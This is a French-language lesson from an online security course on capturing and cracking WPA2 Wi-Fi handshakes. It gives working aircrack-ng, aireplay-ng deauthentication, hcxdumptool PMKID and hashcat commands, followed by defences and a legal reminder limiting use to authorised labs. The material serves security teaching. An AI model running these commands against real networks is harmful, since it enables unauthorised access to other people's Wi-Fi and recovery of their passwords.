0Pricing
Cyber Security Academy · Leçon

Capture et cassage de la poignée de main WPA2

Capturez une poignée de main en quatre étapes avec aircrack-ng et tentez des attaques par dictionnaire avec Hashcat.

Capture et cassage de la poignée de main WPA2 est une leçon Cyber Security Academy gratuite sur CoddyKit. Ceci est la leçon 2 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Cyber Security Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Cyber Security Academy comprend 4 leçons au total.

Échange de clés à quatre messages

Lorsqu’un client se connecte à un réseau WPA2, l’échange de clés à quatre messages dérive la clé transitoire par paire (PTK) à partir de la PMK (elle-même dérivée de la PSK) et de valeurs aléatoires. La capture de cet échange permet de casser le mot de passe hors ligne.

Configuration du mode moniteur

Le mode moniteur permet à la carte sans fil de capturer toutes les trames, quelle que soit leur destination — ce qui est nécessaire pour capturer passivement l’échange de clés. Il ne fonctionne qu’avec les cartes prenant en charge le mode moniteur.

# Check wireless interface
iwconfig

# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon

# Kill interfering processes first:
sudo airmon-ng check kill

Capture passive de l’échange de clés

Airodump-ng capture les trames passivement. Attendez qu’un client se connecte naturellement ou forcez sa reconnexion au moyen d’une désauthentification. La capture de l’échange de clés apparaît dans l’angle supérieur droit de la sortie d’airodump.

# Scan for networks
sudo airodump-ng wlan0mon

# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w handshake_capture \
  wlan0mon

# Top right shows: WPA handshake: AA:BB:...

Attaque par désauthentification

L’envoi de trames de désauthentification usurpées oblige les clients connectés à se déconnecter puis à se reconnecter, ce qui déclenche une nouvelle capture de l’échange de clés. Cette technique génère beaucoup de trafic, est détectable et exige que le client soit à portée.

# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
  -a AA:BB:CC:DD:EE:FF \
  -c CC:DD:EE:FF:00:11 \
  wlan0mon

# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)

Attaque par PMKID : aucun client requis

L’attaque par PMKID (hcxdumptool) capture le PMKID à partir des trames balise et de sondage sans nécessiter de client connecté. Le PMKID est plus rapide à obtenir et se casse aussi facilement qu’un échange de clés complet.

# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
  -o pmkid.pcapng

# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng

# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txt

Cassage de l’échange de clés avec Hashcat

Convertissez le fichier de capture, puis lancez une attaque avec le mode 22000 de Hashcat (format unifié WPA2) ou le mode 2500 (ancien format). Utilisez rockyou.txt avec des règles pour obtenir les meilleurs résultats.

# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap

# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt

# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule

# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

Cassage avec Aircrack-ng

Aircrack-ng effectue directement le cassage de WPA2 à l’aide du CPU à partir du fichier de capture. Il est plus lent que le cassage par GPU de Hashcat, mais ne nécessite aucune conversion de format.

# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap

# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.cap

Stratégie de liste de mots

La réussite du cassage des mots de passe WPA2 dépend entièrement de la qualité de la liste de mots. Utilisez : rockyou.txt comme référence de base, les jeux de règles de Hashcat pour générer des variantes, des listes propres à l’entreprise (nom+année+symbole) et des listes ciblées issues d’OSINT.

Réalité du temps de cassage

Un mot de passe WPA2 aléatoire de 20 caractères ou plus est irréalisable à casser sur le plan computationnel. Le cassage n’est pratique que contre des mots de passe courts ou fondés sur un dictionnaire. C’est pourquoi la longueur et le caractère aléatoire comptent davantage que les règles de complexité.

Défenses

Utilisez WPA3-SAE (insensible aux attaques par dictionnaire hors ligne), ou WPA2 avec une phrase secrète aléatoire de 20 caractères ou plus, ainsi que WPA2-Enterprise avec EAP-TLS (certificats à la place des mots de passe).

Rappel juridique

Capturer des échanges de clés WPA2 sur des réseaux dont vous n’êtes pas propriétaire est illégal. Toutes les techniques présentées ici s’appliquent uniquement à vos propres réseaux de test ou à des environnements de laboratoire autorisés (par exemple, un laboratoire personnel ou un AP de test dédié).

Vérification rapide

Qu’est-ce que l’attaque par PMKID améliore par rapport à la capture standard de l’échange de clés ?

Résumé : cassage de WPA2

Capturer un échange de clés WPA2 (ou un PMKID) transforme le cassage du Wi-Fi en attaque par dictionnaire hors ligne. La réussite dépend entièrement de la robustesse du mot de passe : les mots de passe courts et fondés sur un dictionnaire sont rapidement cassés, tandis que les mots de passe longs et aléatoires sont pratiquement impossibles à casser. Défendez-vous avec WPA3-SAE, des phrases secrètes robustes et WPA2-Enterprise pour les réseaux d’entreprise.

Questions Fréquemment Posées

La leçon « Capture et cassage de la poignée de main WPA2 » est-elle gratuite ?

Oui — le texte complet de « Capture et cassage de la poignée de main WPA2 » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Cyber Security Academy, passe à CoddyKit PRO. Le cours Cyber Security Academy comprend 4 leçons au total.

Qu'est-ce que j'apprendrai dans « Capture et cassage de la poignée de main WPA2 » ?

Capturez une poignée de main en quatre étapes avec aircrack-ng et tentez des attaques par dictionnaire avec Hashcat. Tu pratiques Cyber Security Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.

Dois-je avoir de l'expérience pour commencer Cyber Security Academy ?

Aucune expérience préalable n'est requise. Cyber Security Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 2 sur 4.

Combien de temps prend la leçon « Capture et cassage de la poignée de main WPA2 » ?

La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.

Peux-tu écrire et exécuter du code dans cette leçon Cyber Security Academy ?

Oui. Chaque leçon Cyber Security Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.

Toutes les leçons de ce cours

  1. Protocoles de sécurité 802.11 : WEP, WPA2, WPA3
  2. Capture et cassage de la poignée de main WPA2
  3. Attaques Evil Twin et portail captif
  4. Wi-Fi d’entreprise : EAP et RADIUS
← Retour à Cyber Security Academy